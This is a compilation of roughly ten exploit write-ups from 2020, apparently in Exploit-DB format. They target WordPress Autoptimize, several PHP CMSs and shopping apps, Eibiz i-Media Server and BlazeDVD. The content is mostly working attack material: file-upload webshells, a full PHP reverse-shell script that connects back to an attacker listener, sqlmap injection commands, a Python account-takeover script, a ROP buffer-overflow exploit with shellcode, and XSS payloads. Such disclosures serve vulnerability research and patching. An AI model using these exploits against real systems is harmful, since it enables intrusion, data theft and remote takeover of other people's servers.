# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated) # Date: 2020-08-24 # Software Link: https://wordpress.org/plugins/autoptimize/ # Author : SunCSR Team # Version: v2.7.6 # Tested on Ubuntu 18.04 / Kali Linux # Reference: https://wpvulndb.com/vulnerabilities/10372 Description : ------------------------------------------------------------------- The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. [POC] Step 1 : POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: pwnme User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------26086940735210916964189813544 Content-Length: 685 Origin: http://pwnme Connection: close Cookie: autoptimize_feed=1; wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602; wp-settings-time-1=1598516614 -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/zip <?php Shell Content Here ! ?> -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="action" ao_ccss_import -----------------------------404272946439029073744006559647 Content-Disposition: form-data; name="ao_ccss_import_nonce" f25ca64f22 -----------------------------404272946439029073744006559647-- [Response] HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Thu, 27 Aug 2020 08:21:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Access-Control-Allow-Origin: http://pwnme.me Access-Control-Allow-Credentials: true X-Robots-Tag: noindex X-Content-Type-Options: nosniff Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Content-Length: 53 {"code":"200","msg":"Settings imported successfully"} Step 2: Access to http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php Recommendations: Update to version 2.7.7 Thank you very much!

# Title: Online Shopping Alphaware 1.0 - 'id' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-28 # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases. #POC sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10

# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation # Date: 2020-08-28 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.eibiz.co.th # Version: 3.8.0 # Tested on: Windows # CVE : N/A #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Eibiz i-Media Server Digital Signage 3.8.0 Remote Privilege Escalation / Account Takeover # # # Vendor: EIBIZ Co.,Ltd. # Product web page: http://www.eibiz.co.th # Affected version: <=3.8.0 # # Summary: EIBIZ develop advertising platform for out of home media in that # time the world called "Digital Signage". Because most business customers # still need get outside to get in touch which products and services. Online # media alone cannot serve them right place, right time. # # Desc: The application suffers from an unauthenticated remote privilege escalation # and account takeover vulnerability that can be triggered by directly calling the # updateUser object (part of ActionScript object graphs), effectively elevating to # an administrative role or taking over an existing account by modifying the settings. # # Tested on: Windows Server 2016 # Windows Server 2012 R2 # Windows Server 2008 R2 # Apache Flex # Apache Tomcat/6.0.14 # Apache-Coyote/1.1 # BlazeDS Application # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5584 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5584.php # # # 26.07.2020 # # import requests import sys#####| import re##### | ############# | ############ | ########### | ########## | ######### | ######## | ####### | ###### | ##### | #PoC | ### | ## | # | class Escalada: def __init__(self): self.session = "11111111112222222222333333333344" self.agent = "DigitalSigner/25.1" self.display = "Intruder Alert" self.ep = "/messagebroker/amf" self.suprole = "Designer" self.serialize = None self.address = None self.usrname = None self.passwrd = None self.headers = None def usage(self): if len(sys.argv) < 5: print("i-Media Server Digital Signage 3.8.0 Privilege Escalation") print("Usage: ./poc.py [ip] [username] [password] [displayname] [role]") print("Example: ./poc.py 192.168.1.1 testingus 111111 Backdoor Administrator") exit(21) else: self.address = sys.argv[1] self.usrname = sys.argv[2] self.passwrd = sys.argv[3] self.display = sys.argv[4] self.suprole = (bytes("Administrator".encode("utf-8")) if len(sys.argv) < 6 else sys.argv[5]) #__ # | Administrator __ # | Designer __ # | Reporter __ # | Approver if not "http" in self.address: self.address = "http://{}".format(self.address) def amf(self): self.cookies = {"JSESSIONID" : self.session} # not really needed self.headers = {"User-Agent" : self.agent, "Accept" : "*/*", "Accept-Language" : "en-US,en;q=0.5", "Accept-Encoding" : "gzip, deflate", "Origin" : self.address, "Connection" : "close", "Referer" : self.address + "/main.swf", "Content-Type" : "application/x-amf"} self.serialize = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E\x75\x6C\x6C" self.serialize += b"\x00\x03\x2F\x35\x38\x00\x00\x01\xFE\x0A\x00\x00" self.serialize += b"\x00\x01\x11\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E" self.serialize += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67\x2E\x6D\x65" self.serialize += b"\x73\x73\x61\x67\x65\x73\x2E\x52\x65\x6D\x6F\x74" self.serialize += b"\x69\x6E\x67\x4D\x65\x73\x73\x61\x67\x65\x0D\x73" self.serialize += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65\x72\x61\x74" self.serialize += b"\x69\x6F\x6E\x13\x6D\x65\x73\x73\x61\x67\x65\x49" self.serialize += b"\x64\x13\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x09" self.serialize += b"\x62\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E\x74\x49" self.serialize += b"\x64\x17\x64\x65\x73\x74\x69\x6E\x61\x74\x69\x6F" self.serialize += b"\x6E\x15\x74\x69\x6D\x65\x54\x6F\x4C\x69\x76\x65" self.serialize += b"\x0F\x68\x65\x61\x64\x65\x72\x73\x01\x06\x15\x75" self.serialize += b"\x70\x64\x61\x74\x65\x55\x73\x65\x72\x06\x49\x31" self.serialize += b"\x42\x38\x39\x37\x41\x38\x36\x2D\x37\x33\x42\x45" self.serialize += b"\x2D\x30\x35\x42\x31\x2D\x43\x45\x42\x33\x2D\x41" self.serialize += b"\x30\x35\x35\x30\x39\x36\x34\x31\x31\x34\x34\x04" self.serialize += b"\x00\x09\x05\x01\x0A\x81\x73\x1B\x64\x73\x2E\x6D" self.serialize += b"\x6F\x64\x65\x6C\x2E\x55\x73\x65\x72\x11\x70\x61" self.serialize += b"\x73\x73\x77\x6F\x72\x64\x0D\x63\x72\x65\x61\x74" self.serialize += b"\x65\x07\x74\x65\x6C\x07\x66\x61\x78\x09\x6E\x61" self.serialize += b"\x6D\x65\x0F\x61\x64\x64\x72\x65\x73\x73\x0D\x75" self.serialize += b"\x70\x64\x61\x74\x65\x05\x69\x64\x0D\x6D\x6F\x62" self.serialize += b"\x69\x6C\x65\x0F\x75\x44\x65\x6C\x65\x74\x65\x15" self.serialize += b"\x64\x65\x70\x61\x72\x74\x6D\x65\x6E\x74\x09\x72" self.serialize += b"\x6F\x6C\x65\x09\x72\x65\x61\x64\x0B\x65\x6D\x61" self.serialize += b"\x69\x6C\x0F\x63\x6F\x6D\x70\x61\x6E\x79\x06" #-" self.bytecount = len(self.passwrd * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.passwrd.encode("utf-8"))) #-----------" self.serialize += b"\x03\x06\x19\x31\x31\x31\x2D\x32\x32\x32\x2D\x33" self.serialize += b"\x33\x33\x33\x06\x19\x33\x33\x33\x2D\x32\x32\x32" self.serialize += b"\x2D\x31\x31\x31\x31\x06" #---------------------" self.bytecount = len(self.display * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.display.encode("utf-8"))) #-----------" self.serialize += b"\x06\x1F\x49\x6D\x61\x67\x69\x6E\x61\x72\x79\x53" self.serialize += b"\x74\x72\x65\x65\x74\x03\x06" #-----------------" self.bytecount = len(self.usrname * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.usrname.encode("utf-8"))) #-----------" self.serialize += b"\x06\x01\x03\x06\x11\x53\x65\x63\x75\x72\x69\x74" self.serialize += b"\x79\x06" #-------------------------------------" self.bytecount = len(self.suprole * 2) + 1 self.bytesdata = [self.bytecount] self.serialize += "".join(map(chr, self.bytesdata)) self.serialize += (bytes(self.suprole.encode("utf-8"))) #-----------" self.serialize += b"\x03\x06\x15\x7A\x73\x6C\x40\x77\x68\x61\x2E\x62" self.serialize += b"\x61\x06\x07\x5A\x53\x4C\x06\x42\x01\x06\x17\x75" self.serialize += b"\x73\x65\x72\x53\x65\x72\x76\x69\x63\x65\x04\x00" self.serialize += b"\x0A\x0B\x01\x09\x44\x53\x49\x64\x06\x49\x34\x41" self.serialize += b"\x35\x46\x33\x33\x43\x33\x2D\x37\x31\x31\x46\x2D" self.serialize += b"\x35\x38\x45\x38\x2D\x39\x30\x35\x30\x2D\x39\x35" self.serialize += b"\x44\x31\x30\x30\x46\x33\x44\x45\x33\x45\x15\x44" self.serialize += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74\x06\x0D\x6D" self.serialize += b"\x79\x2D\x61\x6D\x66\x01" #---------------------" print("First try...") req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize) #print(req.text.encode("utf-8")) if "Detected duplicate HTTP-based FlexSessions" in req.text: print("Second try...") req = requests.post(self.address + self.ep, headers=self.headers, cookies=self.cookies, data=self.serialize) #print(req.text.encode("utf-8")) if "AcknowledgeMessage" in req.text: print("You are " + self.suprole + " now!") else: print("Didn't work.") exit(0) else: print("Try again!") def main(self): self.usage() self.amf() if __name__ == '__main__': Escalada().main()

# Title: Online Book Store 1.0 - 'id' SQL Injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-21 # Vendor Homepage: https://www.sourcecodester.com/php/14383/online-book-store.html # Software Link: https://www.sourcecodester.com/download-code?nid=14383&title=Online+Book+Store # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "id" is vulnerable to Union-Based blind SQL injection in this path "/online%20book%20store/detail.php?id=44" that leads to retrieve all databases. #POC sqlmap -u "http://TARGET/online%20book%20store/detail.php?id=44" -p id --dbms=mysql --threads=10 --technique=U --dbs

## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP) ## Author: emalp ## Date: 2020-08-31 ## Vendor Homepage: http://www.blazevideo.com/ ## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe ## Version: 7.0.0.0 ## Tested on: Windows 7 Home Basic # Run this file # bfile.plf will be generated # In blazeDVD open playlist and select bfile.plf # a pop up box will appear with text 'emalp' ## Change shellcode according to your needs ## Shellcode max size is aroung 700 bytes. # bad chars: # \x00, \x0a, \x0b, \x1a import struct bfile = open('bfile.plf','w') buf = 'A'*84 buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret buf += 'AAAA' # ret 04 ting from sehandler buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret buf += 'A'*500 buf += 'BBBB' # nseh buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04 #--------------------------------------------------------------------- # this way we have a lot more space for shellcode. buf += 'AAAA' # esp lands here. #setting up the dynamic pointer for virtual protect buf += struct.pack('<L', 0x61640e32) # pop eax; retn. buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32 buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax] # now eax has the kernel32.dll pointer buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04 buf += struct.pack('<L', 0x61640e32) # pop eax ret buf += 'XXXX' # ret 4 padding buf += struct.pack('<L', 0xffff675d) # neg to 98a3 buf += struct.pack('<L', 0x603267d4) # neg eax; ret # right now eax = 98a3; esi = [0012f95c] = k32.dll val buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret buf += 'XXXX' # pop esi padding buf += struct.pack('<L', 0x641045f4) # sub eax,ecx # now eax has the pointer to VirtualProtect #------------------------------------------------------------------------ # SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM # SETTING ESI buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4 # SETTING EBP buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret buf += 'XXXX' # prev ret 4 padding buf += struct.pack('<L', 0x60349b63) # jmp esp # SETTING EBX buf += struct.pack('<L', 0x61629938) # pop eax; ret buf += struct.pack('<L', 0xfffffdff) # neg to 0x201 buf += struct.pack('<L', 0x6033b16b) # neg eax; ret buf += struct.pack('<L', 0x61640124) # xchg eax,ebx # SETTING EDX buf += struct.pack('<L', 0x616310e8) # pop eax; ret buf += struct.pack('<L', 0xffffffc0) # neg of 0x40 buf += struct.pack('<L', 0x6033b16b) # neg eax; retn buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx # SETTING ECX buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret buf += struct.pack('<L', 0x1001524e) # writable location # SETTING EDI buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret buf += struct.pack('<L', 0x6162e802) # retn (rop nop) # SETTING EAX buf += struct.pack('<L', 0x6162d638) # pop eax; retn buf += struct.pack('<L', 0x90909090) # nop # FINALLY PUSHAD buf += struct.pack('<L', 0x6033cd4a) # push ad buf += '\x90\x90\x90\x90'*4 # shellcode generated using: # msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp" # -b '\x00\x0a\x0b\x1a' buf += ( "\xbb\x42\xa8\xb5\x43\xda\xc7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x41\x83\xc2\x04\x31\x5a\x0f\x03\x5a\x4d\x4a\x40\x9a\xba\x11" "\x72\x69\x18\xd2\xb4\x40\xd2\x6d\x86\xad\x76\x19\x99\x1d\xfd" "\x6b\x56\xd5\x77\x88\xed\xaf\x7f\x3b\x8f\x0f\xf4\x0d\x48\x1f" "\x12\x07\x5b\xc6\x23\x36\x64\x18\x43\x33\xf7\xff\xa7\xc8\x4d" "\x3c\x2c\x9a\x65\x44\x33\xc9\xfd\xfe\x2b\x86\x58\xdf\x4a\x73" "\xbf\x2b\x05\x08\x74\xdf\x94\xe0\x44\x20\xa7\x3c\x5a\x72\x43" "\x7c\xd7\x8c\x8a\xb2\x15\x92\xcb\xa6\xd2\xaf\xaf\x1c\x33\xa5" "\xae\xd6\x19\x61\x31\x02\xfb\xe2\x3d\x9f\x8f\xaf\x21\x1e\x7b" "\xc4\x5d\xab\x7a\x33\xd4\xef\x58\xdf\x87\x2c\x12\xd7\x6e\x67" "\xda\x0d\xf9\x45\xb5\x43\xb7\x47\xaa\x0e\xaf\xc7\xcd\x50\xd0" "\x71\x74\xab\x95\xfc\xaf\x51\x9a\x87\x4c\xb2\x0e\x60\xe2\x45" "\x51\x8f\x72\xfc\xa5\x18\xe9\x93\x95\x99\x99\x58\xe7\x37\x3e" "\xf7\x72\x3b\xdb\x75\x4c\x60\xab\x26\x88\x9c\x25\x30\x86\x5f" "\x60\xb9\xaf\x62\xdb\x7a\x07\xc0\x91\xc0\xd0\x19\x0e\x6b\x36" "\x7e\xb1\x74\x39\xe9\x22\xf3\x9d\xca\xd4\x62\x7a\x6e\x67\x0d" "\xc9\x15\x14\xbe\xe0\x0e\x52\x1c\x26\xbb\xea\x7e\x4e\xcb\xb4" "\xa0\xae\x43\x20\xcc\xcf\xff\x9b\xc7\x87\x4c\xf8\xd2\x1e\xad" "\x31\x0f\x72\x7d\x63\xfd\x8d\x51\xb2\xc1\x21\xad\xe0\xc9" ) buf += '\x90\x90\x90\x90'*5 buf += 'E'*200 bfile.write(buf) bfile.close()

# Exploit Title: Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) # Date: 2020-08-19 # Exploit Author: c0mpu7er（@ymbank.cn） # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.8.zip # Version: 1.4.7 # Tested on: PHP 5.4.45, Apache 2.4.23 ,mysql 5.0 1. Description: ---------------------- FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1 Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from one of the affected pages with 'fuel_replace_id' parameter and save it like 33.txt Then run SQLmap to extract the data from the database: python sqlmap.py -r 33.txt --dbs 3.Example payload: Content-Disposition: form-data; name="fuel_replace_id" 11%27 4. Burpsuite request payload: ---------------------- POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1 Host: 192.168.1.12 Content-Length: 347 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.12 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135 Connection: close ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="fuel_replace_id" 11* ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="Submit" Submit ------WebKitFormBoundarygI1zKZoBINTcL87g Content-Disposition: form-data; name="fuel_inline" 1 ------WebKitFormBoundarygI1zKZoBINTcL87g-- 5. Timeline: ---------------------- 2020-08-20: SQLi vulnerability found in Fuel CMS 1.4.8 2020-08-20: Reported vulnerability to vendor 2020-08-22: Vendor has patched the SQLi vulnerability in version 1.4.9

# Exploit Title: Mara CMS 7.5 - Reflective Cross-Site Scripting # Google Dork: NA # Date: 2020-08-01 # Exploit Author: George Tsimpidas # Vendor Homepage: https://sourceforge.net/projects/maracms/ # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # Version: 7.5 # Tested on: Kali Linux(x64) # CVE : CVE-2020-24223 Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability. Description : This Reflected XSS vulnerability allows any authenticated user to inject malicious code via the parameter contact.php?theme=<inject>. The vulnerability exists because the parameter is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser. PoC : Use Payload : seven69387';alert(1)//154 Path : http://localhost/contact.php?theme=< inject payload here> Injection Example : http://localhost/contact.php?theme=seven69387';alert(1)//154

#!/usr/bin/python3 #-*- coding: utf-8 -*- # Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) # Google Dork: N/A # Date: 2020-08-31 # Exploit Author: Luis Noriega (@nogagmx) # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip # Version: 2.2.14 # Tested on: Linux Ubuntu 18.04.4 LTS # CVE : N/A # Usage: # python3 exploit.py --url http://URL/cmsms/admin/login.php -u admin -p password -lhost LHOST -lport LPORT from urllib.parse import urlparse import requests import argparse import string import random import json import sys def parse_url(URL): t = urlparse(URL) return t.scheme+'://'+t.netloc+t.path.split('login.php')[0] + 'moduleinterface.php' parser = argparse.ArgumentParser(description='CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell') parser.add_argument('--url', dest='URL', help='URL to admin pane </admin/login.php>', required=True) parser.add_argument('-u', dest='USERNAME', help='Username', required=True) parser.add_argument('-p', dest='PASSWORD', help='Password', required=True) parser.add_argument('-lhost', dest='IP', help='The listen address', required=True) parser.add_argument('-lport', dest='PORT', help='The listen port', required=True) args = parser.parse_args() login_data = {'username':"", "password":"", "loginsubmit": "Submit"} PAYLOAD = '<?php set_time_limit (0); $VERSION = "1.0"; $ip = "%s"; $port = "%s"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>'% (args.IP,args.PORT) FILENAME = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.phar' file = {'m1_files[]': (FILENAME, PAYLOAD)} upload_data = {"mact":"FileManager,m1_,upload,0", "__c":"", "disable_buffer":"1"} URL_UPLOAD = parse_url(args.URL) print("[ + ] Connection to the CMS Made Simple Admin Portal located at "+ args.URL) print("[ + ] Using "+ args.USERNAME +":"+ args.PASSWORD); login_data['username'] = args.USERNAME; login_data['password'] = args.PASSWORD try: session = requests.session() req = session.post(args.URL, data=login_data) upload_data["__c"] = session.cookies["__c"] print ("[ + ] %s logged successfully!"%(args.USERNAME)) response = requests.post(URL_UPLOAD, files=file, cookies=session.cookies,data=upload_data) data = response.json() print ("[ + ] %s file uploaded."%(FILENAME)) URL_TRIGGER = data[0]['url'] input("[ ! ] Set up your nc listener <nc -nvlp %s>, then press any to exploit.."%(args.PORT)) print ("[ + ] Pwned!!") response = requests.get(URL_TRIGGER, cookies=session.cookies) print ("[ + ] Bye") except: print ("[ x ] Something went wrong, try again.") sys.exit(1)

# Exploit Title: moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated) # Date: 2020-08-31 # Exploit Author: Abdulkadir Kaya # Vendor Homepage: https://www.mozilo.de/ # Version: 2.0 # Tested on: Windows & WampServer 1- Go to following url. >> http://(HOST)/(PATH)/admin/ 2- Login the admin panel. 3- Go to "Content". 4- Write XSS payload in the "Content Page" section. 5- Save. NOTE: Content Page must be in the Category. ((XSS Payloads)) 1-<script>alert("XSS Confirmed");</script> 2-<script>alert(document.cookie);</script> 3-<script>alert(document.domain);</script> (( REQUEST )) POST /mozilo/admin/index.php HTTP/1.1 Host: 127.0.0.1:8088 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:8088/mozilo/admin/index.php?nojs=true&action=catpage&multi=true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 269 Origin: http://127.0.0.1:8088 Connection: close Cookie: mozilo_editor_settings=true,false,mozilo,12px; PHPSESSID=1jlbsfbodasafasl121chjv5947j0s; MOZILOID_875895d61510deasdfa1a7ad7cc6047f819=5tqsm5d5nvphqimdpqcnq4tqit action=catpage&sort_array[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E] =%5BWilkommen%5D&changeart=cat_page_move&cat_page_change[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521 %2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D

# Exploit Title: Mara CMS 7.5 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-08-31 # Exploit Author: Michele Cisternino (0blio_) # Vendor Homepage: https://sourceforge.net/projects/maracms/ # Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # Version: 7.5 # Tested on: Kali Linux(x64) # CVE: N/A # Description MaraCMS 7.5 is vulnerable to Authenticated Remote Code Execution. In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS as 'admin' or 'manager'. The file uploader fails to check extensions of files uploaded by the user, so it is possible to upload a webshell and get RCE. # PoC 1. Login on MaraCMS. Default credentials are: Username: admin Password: changeme 2. Navigate the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with content '<?php system($_GET["cmd"]); ?>'. A request similar to the following will be made: POST /codebase/handler.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------1202504167994776142974823268 Content-Length: 1282 Origin: http://localhost Connection: close Referer: http://localhost/codebase/dir.php?type=filenew Cookie: your_sitename_session_session=krevi5f3gr416p3o7cqdk4j1vv Upgrade-Insecure-Requests: 1 -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="authenticated" MQ== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="action" dXBsb2Fk -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="MAX_FILE_SIZE" 10485760 -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="type" filenew -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="files[]"; filename="webshell.php" Content-Type: application/x-php <?php system($_GET["cmd"]); ?> -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="usr" YWRtaW4= -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="pwd" MWUyNzUwMTA3OTgyNzQ2NTQ5ZDZlYWY0MWNmMzcwZTBlZTc3NWNiNWZiNTExMWNhOGI5ZWNjNWI0M2JkOGE2NA== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="authenticated" MQ== -----------------------------1202504167994776142974823268 Content-Disposition: form-data; name="destdir" -----------------------------1202504167994776142974823268-- 3. Execute remote commands by navigating: http://target/webshell.php?cmd=whoami

